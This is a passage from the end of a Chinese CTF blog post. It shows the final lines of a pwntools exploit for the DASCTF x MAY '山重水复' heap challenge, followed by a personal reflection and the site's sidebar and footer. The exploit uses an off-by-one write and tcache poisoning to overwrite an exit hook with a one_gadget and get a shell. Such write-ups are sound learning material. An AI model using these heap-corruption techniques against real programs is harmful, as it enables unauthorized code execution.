class="line"></span><br><span class="line"><span class="comment">#print(hex(base))</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x18</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x18</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x18</span>)</span><br><span class="line">edit(<span class="number">0</span>,<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x18</span>+p8(<span class="number">0x41</span>))</span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x30</span>)</span><br><span class="line">dele(<span class="number">2</span>)</span><br><span class="line">off_set=<span class="number">0x222f68</span></span><br><span class="line">fake_next=libc_base+off_set</span><br><span class="line"><span class="comment">#fake_next=0x7ffff7ffdf70</span></span><br><span class="line">edit(<span class="number">1</span>,p64(<span class="number">0</span>)*<span class="number">3</span>+p64(<span class="number">0x21</span>)+p64(fake_next)+<span class="string">b&#x27;\n&#x27;</span>)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x18</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x18</span>)</span><br><span class="line">one=libc_base+one_gadget[<span class="number">0</span>]</span><br><span class="line">edit(<span class="number">2</span>,p64(one)+<span class="string">b&#x27;\n&#x27;</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">menu(<span class="number">4</span>)</span><br><span class="line"><span class="comment">#add(2,0x30)</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="四、又是一些碎碎念"><a href="#四、又是一些碎碎念" class="headerlink" title="四、又是一些碎碎念"></a>四、又是一些碎碎念</h3><p>打完das之后的第二天省赛，又是off by one…我只能把exp写到劫持free_hook，因为开了沙箱，而我又对orw一窍不通，只能丢给师兄，自己在一旁坐牢。</p>
<p>现在逐渐又有了pwn的动力了，f师傅和g师傅都那么猛，我不能落下，丢了二进制冲分小队的脸orz。此外特别鸣谢我的偶像uuu师傅，能认识uuu师傅真的很开心捏</p>
<p>接下来就是准备下期末考，争取不挂科的同时摸摸ctf，搞搞作品赛</p>
<p><strong>hustle every day</strong></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/04/20/%E8%BF%91%E6%97%A5%E5%AD%A6%E4%B9%A0%E7%A2%8E%E7%89%87/" rel="prev" title="今日学习碎片">
      <i class="fa fa-chevron-left"></i> 今日学习碎片
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/07/20/Game%5B1%5D%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%88%9D%E8%B5%9Bwp-pwn/" rel="next" title="Game[1]蓝帽杯初赛wp-pwn">
      Game[1]蓝帽杯初赛wp-pwn <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">一、前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E5%81%9A%E9%A2%98%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-number">2.</span> <span class="nav-text">二、做题前置知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%E3%80%81%E5%85%B3%E4%BA%8EIO-FILE"><span class="nav-number">2.1.</span> <span class="nav-text">1、关于IO FILE</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%9D%E8%AF%86IO-FILE"><span class="nav-number">2.1.1.</span> <span class="nav-text">初识IO FILE</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E6%89%BE%E5%88%B0stdout%E7%9A%84%E4%BD%8D%E7%BD%AE"><span class="nav-number">2.1.2.</span> <span class="nav-text">如何找到stdout的位置</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#what%E2%80%99s-%E6%AE%8B%E7%95%99%E7%9A%84fd%E6%8C%87%E9%92%88"><span class="nav-number">2.1.3.</span> <span class="nav-text">what’s 残留的fd指针</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%E3%80%81%E5%85%B3%E4%BA%8Etcache"><span class="nav-number">2.2.</span> <span class="nav-text">2、关于tcache</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#tcache%E7%BB%93%E6%9E%84%E4%BD%93"><span class="nav-number">2.2.1.</span> <span class="nav-text">tcache结构体</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#tcache%E7%9A%84%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5"><span class="nav-number">2.2.2.</span> <span class="nav-text">tcache的攻击手段</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%E3%80%81%E5%85%B3%E4%BA%8Eexit-hook"><span class="nav-number">2.3.</span> <span class="nav-text">3、关于exit hook</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E4%BE%8B%E9%A2%98-DASCTF-x-MAY-%E5%B1%B1%E9%87%8D%E6%B0%B4%E5%A4%8D"><span class="nav-number">3.</span> <span class="nav-text">三、例题 DASCTF x MAY 山重水复</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80%E4%BA%9Bbbll"><span class="nav-number">3.0.1.</span> <span class="nav-text">一些bbll</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90"><span class="nav-number">3.0.2.</span> <span class="nav-text">代码分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E9%80%BB%E8%BE%91"><span class="nav-number">3.0.3.</span> <span class="nav-text">利用逻辑</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AE%8C%E6%95%B4exp%EF%BC%9A"><span class="nav-number">3.0.4.</span> <span class="nav-text">完整exp：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E5%8F%88%E6%98%AF%E4%B8%80%E4%BA%9B%E7%A2%8E%E7%A2%8E%E5%BF%B5"><span class="nav-number">3.1.</span> <span class="nav-text">四、又是一些碎碎念</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">A2ur2</p>
  <div class="site-description" itemprop="description">在成为大赛pwn题签到员的路上</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">A2ur2</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
